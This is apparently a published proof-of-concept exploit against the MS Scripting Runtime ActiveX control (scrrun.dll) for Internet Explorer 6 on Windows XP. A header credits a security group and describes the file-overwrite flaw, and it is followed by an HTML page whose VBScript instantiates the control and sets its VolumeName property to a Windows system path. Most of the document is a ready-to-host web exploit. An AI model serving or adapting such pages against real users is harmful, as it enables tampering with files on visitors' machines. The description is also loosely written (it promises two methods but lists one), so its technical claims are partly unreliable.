?<!--



MS Scripting Runtime ActiveX (scrrun.dll) Remote File Overwrite Exploit

############################################################
##        Pentesters Security Researching Group           ##
##               Www.Pentesters.iR                        ##
##               PLATEN " H.jafari "                      ##
##                                                        ##
## E-mail and blog:                                       ##
##                                                        ##
## platen.gigfa.com 		                          ##
## platen.secure[at]gmail[dot] com                        ## 
##                                                        ##
## Greetings: b3hz4d ~ Cru3l.b0y ~ Cdef3nder ~ Snake      ##
## and all members in Pentesters.ir                       ##
############################################################

Description:  scrrun.dll contains libraries for reading and writing scripts and text files.

vendor site: www.Microsoft.com
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 6

Details
*******

This control contains two methods Property Let VolumeName  As String() that can be used to owervrite 
any file on OS

Property Let VolumeName  As String






-->

<html>

<object classid='clsid:C7C3F5B1-88A3-11D0-ABCB-00A0C90FFFC0' id='target' />
<script language='vbscript'>

targetFile = "C:\WINDOWS\system32\scrrun.dll"
prototype  = "Property Let VolumeName As String"
memberName = "VolumeName"
progid     = "Scripting.Drive"
argCount   = 1
arg1="c:\windows\system_.ini"
target.VolumeName = arg1

</script>
<html>